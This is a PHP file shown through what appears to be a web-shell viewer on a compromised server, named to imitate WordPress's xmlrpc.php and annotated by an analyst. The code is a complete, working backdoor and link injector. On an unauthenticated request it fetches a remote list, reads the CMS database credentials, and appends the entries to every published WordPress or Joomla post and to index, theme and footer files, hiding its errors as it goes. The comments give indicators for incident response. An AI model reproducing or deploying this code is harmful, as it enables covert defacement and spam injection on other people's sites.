
Current Path : /home/quafra/public_html/

Linux srv5.tanoweb.com 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Current File : /home/quafra/public_html/xmllrpc.php

<?php
// Analyst note: this script is a link injector. Driven only by query-string
// parameters, it downloads a list of strings from a remote URL and writes them
// into a site's pages or into its CMS database. No authentication check appears
// anywhere in this file, so any client that can reach the URL can trigger it.
// Log hunting: requests to this file carrying insert=, datainsert=, num= or
// delete=del in the query string.
header('Content-Type:text/html;charset=utf-8');
// Remove the execution-time limit and attempt to raise resource limits so a
// long run over many files or rows is not interrupted.
set_time_limit(0);
ini_set('limit_memory','1024M');
ini_set('max_execution_time',100000);
// Turn off error reporting and display, so failures are not shown in the response.
error_reporting(0);
ini_set('display_errors',0);
// Default-document file names that later code will try to modify.
$other_file = array('index.php','index.html','index.htm','index.shtml','index.html.bak.bak','index.html.bak','default.htm','default.html','home.html','home.htm');
// ?delete=del calls unlink() on $php_Self. That variable is never assigned in
// this listing. NOTE(review): presumably intended as self-removal — confirm
// against other samples.
if(@$_GET['delete'] == 'del'){
	@unlink($php_Self);
}
// Without an insert= or datainsert= parameter the script stops here and
// returns an empty page, so a plain request to the file shows nothing.
if(@$_GET['insert'] ==false && @$_GET['datainsert']==false){
	return;
}
// num= sets how many fetched entries are written per target; values below 1
// (or a missing parameter) fall back to 5.
if(@$_GET['num']){
	$insert_num=(int)$_GET['num'];
}
if(@$insert_num<1){
	$insert_num = 5;
}

// CMS discovery: starting at the script's own directory ('./') and then
// walking upward ('../', '../../', ...) for at most $deeppath levels, look for
// a WordPress or Joomla installation using is_wordpress()/is_joomla() defined
// at the end of this file.
$is_wp = false;
$is_jm = false;
// Directory whose default documents are modified later ('.' = script directory).
$other = '.';
// Separator placed between injected entries.
$link_split = "&nbsp;";
$deeppath = 50;
$dirstring = './';
for($i=0;$i<$deeppath;$i++){
	
	if(is_wordpress($dirstring)){
		$is_wp = true;
		// Including wp-config.php executes the site's own configuration in this
		// script, which is how the DB_* constants and $table_prefix read further
		// down become available.
		if(is_file($dirstring.'/wp-config.php')){
			include $dirstring.'/wp-config.php';
		}
		break;
	}
	if(is_joomla($dirstring)){
		$is_jm = true;
		// Same for Joomla: configuration.php is included and the JConfig class
		// is instantiated later to read the database settings.
		if(is_file($dirstring.'/configuration.php')){
			include $dirstring.'/configuration.php';
		}
		break;
	}
	
	// After the first pass the './' prefix is dropped and one '../' is added
	// per iteration; $dirstring keeps the matching level when the loop breaks.
	if($i==0){
		$dirstring='';
	}
	$dirstring.='../';
	
}
// datainsert= selects database mode; its value replaces insert= as the URL to fetch.
$is_db = false;
if(isset($_GET['datainsert']) && $_GET['datainsert'] !=false){
	$_GET['insert'] = $_GET['datainsert'];
	$is_db = true;
}
// The URL comes straight from the request and is fetched server-side by
// crul_get() (defined below). For responders this means an outbound HTTP(S)
// connection from the web server to whatever host the parameter named, which
// may be visible in egress or proxy logs.
$getlink  = trim(crul_get($_GET['insert']));
if($getlink == false){
	echo 'Curl Get Link Failed<br>';
	return;
}else{
	// The response is treated as a newline-separated list of entries.
	$getlink = explode("\n", $getlink);
}
// Drop blank lines and trim surrounding whitespace from each entry.
foreach($getlink as $key=>$values){
	if(trim($values)==false){
		unset($getlink[$key]);
		continue;
	}
	$getlink[$key] = trim($values);
}
// Message text: "link list is empty".
if(count($getlink)==1 && $getlink[0]==false){
	echo '链接列表为空<br>';
	return;
}
// De-duplicate, then cap the per-target count at the number of entries available.
$getlink = array_unique($getlink);
$getlink_count = count($getlink);
if($getlink_count<=$insert_num){
	$insert_num = $getlink_count;
}	
// Injection stage. Three branches: WordPress, Joomla, or neither.
// Cleanup pointers for responders, all derived from the writes below:
//   - WordPress: post_content of published rows in <prefix>posts, index.php in
//     the site root, footer.php in each directory under wp-content/themes.
//   - Joomla: introtext/fulltext in <prefix>content, index.php in the site
//     root, index.php in each directory under templates.
//   - Any site: the default documents listed in $other_file in the script's
//     directory (content is prepended as a new first line).
//   - Injected entries are joined with "&nbsp;"; targets may also have had
//     their mode changed to 0644 or 0755.
if($is_wp==true){
	if($is_db==true){
		// Database mode: relies on the DB_* constants and $table_prefix defined
		// by the wp-config.php that was included earlier.
		$is_conn = true;
		if(defined('DB_NAME') && defined('DB_USER') && defined('DB_PASSWORD')){
			if(!defined('DB_HOST')){
				define('DB_HOST', 'localhost');
			}
			// Path 1: legacy mysql_* functions, used when they exist.
			if(function_exists('mysql_connect')){
				
				if(!$conn=@mysql_connect(DB_HOST,DB_USER,DB_PASSWORD,true)){
					$is_conn = false;
				}
				if (!mysql_select_db(DB_NAME, $conn)) {
					$is_conn = false;
				}
				if($is_conn==true){
				// Count, then load, the ID and body of every published post.
				$check_num = @mysql_fetch_assoc(mysql_query('select count(*) as num from '.$table_prefix.'posts where post_status ="publish"'));
				if($check_num['num']>0){
					$select_post = @mysql_query('select ID,post_content from '.$table_prefix.'posts where post_status ="publish"');
					$blog_content = array();
					while($result = mysql_fetch_assoc($select_post)){
						$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content']);
					}
					// For each post, take the next $insert_num entries from the
					// shuffled list (reshuffling when the index runs past the end)
					// and append them to the end of the post body.
					shuffle($getlink);
					$k=0;
					foreach($blog_content as $key=>$values){
						$link_string = '';
						for($i=0;$i<$insert_num;$i++){
							if(@$getlink[$k]==false){
								shuffle($getlink);
								$k = 0;
							}
							$link_string.=$getlink[$k].$link_split;
							$k++;
						}
						$link_string = rtrim($link_string,$link_split);
						$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
					}
					// Write every modified body back and count rows that changed.
					$blog_k = 0;
					foreach($blog_content as $key=>$val){
						$updateblog = mysql_query('UPDATE '.$table_prefix.'posts set post_content="'.addslashes($val['post_content']).'" where ID='.$val['ID']);
						if(mysql_affected_rows ()>0){
							$blog_k++;
						}
					}
					mysql_close($conn);
					// Message text: "successfully inserted N records".
					echo '成功插入 '.$blog_k.' 条数据';
				}else{
					$is_conn = false;
				}
				}
			// Path 2: identical logic through mysqli.
			}elseif(function_exists('mysqli_connect')){
				if(!$conn=@mysqli_connect(DB_HOST,DB_USER,DB_PASSWORD)){
					$is_conn = false;
				}
				if (!mysqli_select_db($conn,DB_NAME)) {
					$is_conn = false;
				}
				if($is_conn==true){
				$check_num = @mysqli_fetch_array(mysqli_query($conn,'select count(*) as num from '.$table_prefix.'posts where post_status ="publish"'));
				if($check_num['num']>0){
					$select_post = @mysqli_query($conn,'select ID,post_content from '.$table_prefix.'posts where post_status ="publish"');
					$blog_content = array();
					while($result = mysqli_fetch_array($select_post)){
						$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content']);
					}
					shuffle($getlink);
					$k=0;
					foreach($blog_content as $key=>$values){
						$link_string = '';
						for($i=0;$i<$insert_num;$i++){
							if(@$getlink[$k]==false){
								shuffle($getlink);
								$k = 0;
							}
							$link_string.=$getlink[$k].$link_split;
							$k++;
						}
						$link_string = rtrim($link_string,$link_split);
						$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
					}
					$blog_k = 0;
					foreach($blog_content as $key=>$val){
						$updateblog = mysqli_query($conn,'UPDATE '.$table_prefix.'posts set post_content="'.addslashes($val['post_content']).'" where ID='.$val['ID']);
						if(mysqli_affected_rows($conn)>0){
							$blog_k++;
						}
					}
					mysqli_close($conn);
					echo '成功插入 '.$blog_k.' 条数据';
				}else{
					$is_conn = false;
				}
				}
			}else{
				$is_conn = false;
			}
		}else{
			$is_conn = false;
		}	
		// Database mode worked: stop. Otherwise fall through to file mode below.
		if($is_conn==true){
			return;
		}
	}
	// File mode, step 1: index.php in the detected WordPress root.
	$write_index = $dirstring.'index.php';
	shuffle($getlink);
	$k=0;
	// When the file is not writable, try chmod 0644 and then 0755. Unexpected
	// mode changes on these files are a useful indicator during triage.
	if(is_file($write_index) && !is__writeable($write_index)){
		$mod_access = @chmod($write_index,0644);
		if($mod_access == true && !is__writeable($write_index)){
			$mod_access = @chmod($write_index,0755);
		}
	}
	if(is_file($write_index) && is__writeable($write_index)){
		$link_string = '';
		for($i=0;$i<$insert_num;$i++){
			if($getlink[$k]==false){
				shuffle($getlink);
				$k = 0;
			}
			$link_string.=$getlink[$k].$link_split;
			$k++;
		}
		// The entries are written as a new first line, ahead of the original content.
		$get_index = file_get_contents($write_index);
		$put_result = file_put_contents($write_index,$link_string."\n".$get_index);
		if($put_result!=false){
			// Message text: "write succeeded".
			echo $write_index.' 写入成功<br>';
		}
	}
	// File mode, step 2: footer.php in every directory directly under
	// wp-content/themes (traverse() is defined at the end of this file).
	$footer_array = traverse($dirstring.'wp-content/themes');
	foreach($footer_array as $footer_val){
		$footer_val = rtrim($footer_val,'/').'/';
		
		$write_footer = $footer_val.'footer.php';
		if(is_file($write_footer) && !is__writeable($write_footer)){
			$mod_access = @chmod($write_footer,0644);
			if($mod_access == true && !is__writeable($write_footer)){
				$mod_access = @chmod($write_footer,0755);
			}
		}
		if(is_file($write_footer) && is__writeable($write_footer)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					shuffle($getlink);
					$k = 0;
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_footer = file_get_contents($write_footer);
			// A coin flip decides whether the entries go before or after the marker.
			$top_bottom = rand(1,2);
			// Markers are tried in this order and the first match is used:
			// closing footer tag, the wp_footer(); call (entries are wrapped in
			// a PHP echo statement), closing body tag, closing html tag.
			if(stripos($get_footer,'</footer>')){
				if($top_bottom==1){
					$get_footer = str_replace('</footer>',$link_string.'</footer>',$get_footer);
				}else{
					$get_footer = str_replace('</footer>','</footer>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'wp_footer();')){
				$link_string = addslashes($link_string);
				if($top_bottom==1){
					$get_footer = str_replace('wp_footer();','echo "'.$link_string.'"; wp_footer();',$get_footer);
				}else{
					$get_footer = str_replace('wp_footer();','wp_footer();echo "'.$link_string.'";',$get_footer);
				}
			}elseif(stripos($get_footer,'</body>')){
				if($top_bottom==1){
					$get_footer = str_replace('</body>',$link_string.'</body>',$get_footer);
				}else{
					$get_footer = str_replace('</body>','</body>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'</html>')){
				if($top_bottom==1){
					$get_footer = str_replace('</html>',$link_string.'</html>',$get_footer);
				}else{
					$get_footer = str_replace('</html>','</html>'.$link_string,$get_footer);
				}
			}else{
				// No marker found: append (closing an open PHP block first when
				// the open-tag count exceeds the close-tag count by one) or prepend.
				if($top_bottom==1){
					$start_flag = (int)substr_count($get_footer,'<?php');
					$end_flag = (int)substr_count($get_footer,'?>');
					if($start_flag-$end_flag==1){
						$get_footer = $get_footer.' ?>';
					}
					$get_footer = $get_footer.$link_string;
				}else{
					$get_footer = $link_string.$get_footer;
				}
			}
			
			$put_result = file_put_contents($write_footer,$get_footer);
			if($put_result!=false){
				echo $write_footer.' 写入成功<br>';
			}
		}
		
	}
	// File mode, step 3: default documents in $other (set to '.' earlier in
	// the file), skipping index.php.
	$other = rtrim($other,'/');
	if(!is_dir($other)){
		// Message text as written: "directory cannot exist".
		echo $other.' 目录不能存在<br>';
		return;
	}
	if(!is_readable($other) || !is__writeable($other)){
		// Message text: "no permission to modify".
		echo '没有权限修改 '.$other.'<br>';
		return;
	}
	foreach($other_file as $key=>$val){
		if($val=='index.php'){
			continue;
		}
		$write_file = $other.'/'.$val;
		if(is_file($write_file) && !is__writeable($write_file)){
			$mod_access = @chmod($write_file,0644);
			if($mod_access == true && !is__writeable($write_file)){
				$mod_access = @chmod($write_file,0755);
			}
		}
		if(is_file($write_file) && is__writeable($write_file)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					shuffle($getlink);
					$k = 0;
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_file = file_get_contents($write_file);
			$put_result = file_put_contents($write_file,$link_string."\n".$get_file);
			if($put_result!=false){
				echo $write_file.' 写入成功<br>';
			}
		}else{
			if(is_file($write_file)){
				echo $write_file.' 没有权限修改<br>';
			}
			unset($other_file[$key]);
		}
	}
}elseif($is_jm==true){
	// Joomla branch. Database mode reads its settings from the JConfig class
	// provided by the configuration.php that was included earlier.
	$is_conn = false;
	if($is_db==true && class_exists('JConfig')){
		$is_conn=true;
		$obj = new JConfig();
		$db_prefix = isset($obj->dbprefix)?$obj->dbprefix:'';
		$db_name = isset($obj->db)?$obj->db:'';
		$db_user = isset($obj->user)?$obj->user:'';
		// '**' is used as a sentinel for "no password property present".
		$db_password = isset($obj->password)?$obj->password:'**';
		$db_host = isset($obj->host)?$obj->host:'localhost';
		// Target table: <prefix>content.
		$content_tb = $db_prefix.'content';
		if($db_name && $db_user && $db_password!='**'){
			// Path 1: legacy mysql_* functions.
			if(function_exists('mysql_connect')){
				if(!$conn=@mysql_connect($db_host,$db_user,$db_password,true)){
					$is_conn = false;
				}
				if (!mysql_select_db($db_name, $conn)) {
					$is_conn = false;
				}
				if($is_conn==true){
					$check_num = @mysql_fetch_assoc(mysql_query('select count(*) as num from '.$content_tb));
					if($check_num['num']>0){
						// Every row is loaded; there is no status filter here.
						$select_post = @mysql_query('select id as ID,introtext as post_content,`fulltext` from '.$content_tb);
						$blog_content = array();
						while($result = mysql_fetch_assoc($select_post)){
							$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content'],'fulltext'=>$result['fulltext']);
						}
						
						shuffle($getlink);
						$k=0;
						foreach($blog_content as $key=>$values){
							$link_string = '';
							for($i=0;$i<$insert_num;$i++){
								if(@$getlink[$k]==false){
									shuffle($getlink);
									$k = 0;
								}
								$link_string.=$getlink[$k].$link_split;
								$k++;
							}
							$link_string = rtrim($link_string,$link_split);
							// Entries are appended to fulltext when it is non-empty,
							// otherwise to introtext.
							if($values['fulltext']!=false){
								$blog_content[$key]['fulltext'] = $values['fulltext'].$link_split.$link_string;
							}else{
								$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
							}
						}
						$blog_k = 0;
						foreach($blog_content as $key=>$val){
							$updateblog = mysql_query('UPDATE '.$content_tb.' set introtext="'.addslashes($val['post_content']).'",`fulltext`="'.addslashes($val['fulltext']).'" where id='.$val['ID']);
							if(mysql_affected_rows ()>0){
								$blog_k++;
							}
						}
						mysql_close($conn);
						// Message text: "successfully inserted N records".
						echo '成功插入 '.$blog_k.' 条数据';
					}else{
						$is_conn = false;
					}
				}
			// Path 2: identical logic through mysqli.
			}elseif(function_exists('mysqli_connect')){
				if(!$conn=@mysqli_connect($db_host,$db_user,$db_password)){
					$is_conn = false;
				}
				if (!mysqli_select_db($conn,$db_name)) {
					$is_conn = false;
				}
				if($is_conn==true){
					$check_num = @mysqli_fetch_array(mysqli_query($conn,'select count(*) as num from '.$content_tb));
					if($check_num['num']>0){
						$select_post = @mysqli_query($conn,'select id as ID,introtext as post_content,`fulltext` from '.$content_tb);
						$blog_content = array();
						while($result = mysqli_fetch_array($select_post)){
							$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content'],'fulltext'=>$result['fulltext']);
						}
						shuffle($getlink);
						$k=0;
						foreach($blog_content as $key=>$values){
							$link_string = '';
							for($i=0;$i<$insert_num;$i++){
								if(@$getlink[$k]==false){
									shuffle($getlink);
									$k = 0;
								}
								$link_string.=$getlink[$k].$link_split;
								$k++;
							}
							$link_string = rtrim($link_string,$link_split);
							if($values['fulltext']!=false){
								$blog_content[$key]['fulltext'] = $values['fulltext'].$link_split.$link_string;
							}else{
								$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
							}
						}
						$blog_k = 0;
						foreach($blog_content as $key=>$val){
							$updateblog = mysqli_query($conn,'UPDATE '.$content_tb.' set introtext="'.addslashes($val['post_content']).'",`fulltext`="'.addslashes($val['fulltext']).'" where id='.$val['ID']);
							if(mysqli_affected_rows($conn)>0){
								$blog_k++;
							}
						}
						mysqli_close($conn);
						echo '成功插入 '.$blog_k.' 条数据';
					}else{
						$is_conn = false;
					}
				}
			}
		}
	}
	// Database mode worked: stop. Otherwise continue with file mode.
	if($is_conn==true){
		return;
	}
	// File mode, step 1: index.php in the detected Joomla root.
	$write_index = $dirstring.'index.php';
	shuffle($getlink);
	$k=0;
	if(is_file($write_index) && !is__writeable($write_index)){
		$mod_access = @chmod($write_index,0644);
		if($mod_access == true && !is__writeable($write_index)){
			$mod_access = @chmod($write_index,0755);
		}
	}
	if(is_file($write_index) && is__writeable($write_index)){
		$link_string = '';
		for($i=0;$i<$insert_num;$i++){
			if($getlink[$k]==false){
				$k=0;
				shuffle($getlink);
			}
			$link_string.=$getlink[$k].$link_split;
			$k++;
		}
		$get_index = trim(file_get_contents($write_index));
		$put_result = file_put_contents($write_index,$link_string."\n".$get_index);
		if($put_result!=false){
			// Message text: "write succeeded".
			echo $write_index.' 写入成功<br>';
		}
	}
	// File mode, step 2: index.php in every directory directly under templates.
	$footer_array = traverse($dirstring.'templates');
	foreach($footer_array as $footer_val){
		$footer_val = rtrim($footer_val,'/').'/';
		
		$write_footer = $footer_val.'index.php';
		if(is_file($write_footer) && !is__writeable($write_footer)){
			$mod_access = @chmod($write_footer,0644);
			if($mod_access == true && !is__writeable($write_footer)){
				$mod_access = @chmod($write_footer,0755);
			}
		}
		if(is_file($write_footer) && is__writeable($write_footer)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					$k=0;
					shuffle($getlink);
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_footer = file_get_contents($write_footer);
			// Random choice of before/after; markers tried in order: closing
			// footer, body, html tags; otherwise append or prepend.
			$top_bottom = rand(1,2);
			if(stripos($get_footer,'</footer>')){
				if($top_bottom==1){
					$get_footer = str_replace('</footer>',$link_string.'</footer>',$get_footer);
				}else{
					$get_footer = str_replace('</footer>','</footer>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'</body>')){
				if($top_bottom==1){
					$get_footer = str_replace('</body>',$link_string.'</body>',$get_footer);
				}else{
					$get_footer = str_replace('</body>','</body>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'</html>')){
				if($top_bottom==1){
					$get_footer = str_replace('</html>',$link_string.'</html>',$get_footer);
				}else{
					$get_footer = str_replace('</html>','</html>'.$link_string,$get_footer);
				}
			}else{
				if($top_bottom==1){
					$start_flag = (int)substr_count($get_footer,'<?php');
					$end_flag = (int)substr_count($get_footer,'?>');
					if($start_flag-$end_flag==1){
						$get_footer = $get_footer.' ?>';
					}
					$get_footer = $get_footer.$link_string;
				}else{
					$get_footer = $link_string.$get_footer;
				}
	
			}
			$put_result = file_put_contents($write_footer,$get_footer);
			if($put_result!=false){
				echo $write_footer.' 写入成功<br>';
			}
		}
	}
	// File mode, step 3: default documents in $other, skipping index.php.
	$other = rtrim($other,'/');
	if(!is_dir($other)){
		// Message text as written: "directory cannot exist".
		echo $other.' 目录不能存在<br>';
		return;
	}
	if(!is_readable($other) || !is__writeable($other)){
		// Message text: "no permission to modify".
		echo '没有权限修改 '.$other.'<br>';
		return;
	}
	foreach($other_file as $key=>$val){
		if($val=='index.php'){
			continue;
		}
		$write_file = $other.'/'.$val;
		if(is_file($write_file) && !is__writeable($write_file)){
			$mod_access = @chmod($write_file,0644);
			if($mod_access == true && !is__writeable($write_file)){
				$mod_access = @chmod($write_file,0755);
			}
		}
		if(is_file($write_file) && is__writeable($write_file)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					shuffle($getlink);
					$k = 0;
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_file = file_get_contents($write_file);
			$put_result = file_put_contents($write_file,$link_string."\n".$get_file);
			if($put_result!=false){
				echo $write_file.' 写入成功<br>';
			}
		}else{
			if(is_file($write_file)){
				echo $write_file.' 没有权限修改<br>';
			}
			unset($other_file[$key]);
		}
	}
	
}else{
	// Neither CMS detected: only the default documents in $other are touched,
	// and here index.php is included in the list.
	if($other==true){
		$other = rtrim($other,'/');
		if(!is_dir($other)){
			// Message text as written: "directory cannot exist".
			echo $other.' 目录不能存在<br>';
			return;
		}
		if(!is_readable($other) || !is__writeable($other)){
			// Message text: "no permission to modify".
			echo '没有权限修改 '.$other.'<br>';
			return;
		}
		
		foreach($other_file as $key=>$val){
			$write_file = $other.'/'.$val;
			if(is_file($write_file) && !is__writeable($write_file)){
				$mod_access = @chmod($write_file,0644);
				if($mod_access == true && !is__writeable($write_file)){
					$mod_access = @chmod($write_file,0755);
				}
			}
			// The list is reshuffled per file and its first $insert_num entries are used.
			shuffle($getlink);
			if(is_file($write_file) && is__writeable($write_file)){
				$link_string = '';
				for($i=0;$i<$insert_num;$i++){
					$link_string.=$getlink[$i].$link_split;
				}
				$get_file = file_get_contents($write_file);
				$put_result = file_put_contents($write_file,$link_string."\n".$get_file);
				if($put_result!=false){
					// Message text: "write succeeded".
					echo $write_file.' 写入成功<br>';
				}
			}else{
				if(is_file($write_file)){
					echo $write_file.' 没有权限修改<br>';
				}
				unset($other_file[$key]);
			}
		}
		
	}
}
/**
 * Report whether a path can be written to.
 *
 * Directories are checked with is_writable(). For anything else the function
 * tries to open the path in append mode twice and returns true only when both
 * opens succeed; nothing is written through the handle.
 *
 * @param string $filepath Path to test.
 * @return bool True when the path is considered writable.
 */
function is__writeable($filepath) {
	if (is_dir($filepath)) return is_writable($filepath);
	// Append mode leaves existing content untouched while proving write access.
	$fp = @fopen($filepath, 'a');
	if ($fp) {
		@fclose($fp);
		$fp = @fopen($filepath, 'a');
		if ($fp) {
			@fclose($fp);
			return true;
		}
	}
	return false;
}

/**
 * Fingerprint a directory as a Joomla installation.
 *
 * Returns true only when all three paths exist under $path:
 * configuration.php, components/com_content/ and administrator/components/.
 *
 * @param string $path Directory to inspect.
 * @return bool
 */
function is_joomla ($path)
{
	$dir = $path;
		if (file_exists ($dir . '/configuration.php') && file_exists ($dir . '/components/com_content/') && file_exists ($dir . '/administrator/components/'))
		{
			return true;
		}
	return false;
}

/**
 * Fingerprint a directory as a WordPress installation.
 *
 * Because && binds tighter than ||, the test passes when any one of these
 * holds: wp-config.php exists, wp-content/themes/ exists, or both wp-admin/
 * and wp-includes/ exist.
 *
 * @param string $path Directory to inspect.
 * @return bool
 */
function is_wordpress ($path)
{
	$dir = $path;
		// The themes path is concatenated without a leading slash, unlike the others.
		if ((file_exists ($dir . '/wp-config.php') || file_exists ($dir . 'wp-content/themes/')) || file_exists ($dir . '/wp-admin/') && file_exists ($dir . '/wp-includes/'))
		{
			return true;
		}
	return false;
}
/**
 * Fetch a URL with cURL and return the response body.
 *
 * The caller in this file passes a URL taken directly from the query string,
 * so the request target is controlled by whoever calls the script.
 *
 * @param string $url URL to request; a falsy value returns null immediately.
 * @param int    $i   Retry counter used by the recursive call.
 * @return string|bool|null Body on success; the curl_exec() result once the
 *                          counter has reached 10; null otherwise.
 */
function crul_get($url,$i=0){
	if($url==false){
		return;
	}
	$ch = curl_init();
	curl_setopt($ch,CURLOPT_URL,$url);
	// Certificate host-name verification is switched off for this request.
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
	curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 20);
	$sourceBody = curl_exec($ch);
	if(!curl_errno($ch)){
		return $sourceBody;
	}else{
		if($i>=10){
			return $sourceBody;
		}
		$i++;
		// NOTE(review): the value of the recursive call is discarded, so a call
		// that hits a cURL error hands null back to its caller.
		crul_get($url,$i);
	}
	// Reached only after an error path; $s is not defined in this function.
	curl_close ( $s );
}
/**
 * List the directories directly inside $path (not recursive).
 *
 * Paths are returned as "$path/name" with backslashes converted to forward
 * slashes. The result array is a static local, so entries from earlier calls
 * in the same request remain in the returned list; it is never initialised,
 * so the return value is null when no directory has been found.
 *
 * @param string $path Directory to scan.
 * @return array|null
 */
function traverse($path = '.') {
	static $file_array;
	$current_dir = opendir($path);
	while(($file = readdir($current_dir)) !== false) {
		$sub_dir = $path . DIRECTORY_SEPARATOR . $file;
		if($file == '.' || $file == '..') {
			continue;
		} else if(is_dir($sub_dir)) {
			$file_array[]=str_replace("\\",'/',$path . '/' . $file );
		}
	}
	return $file_array;
}
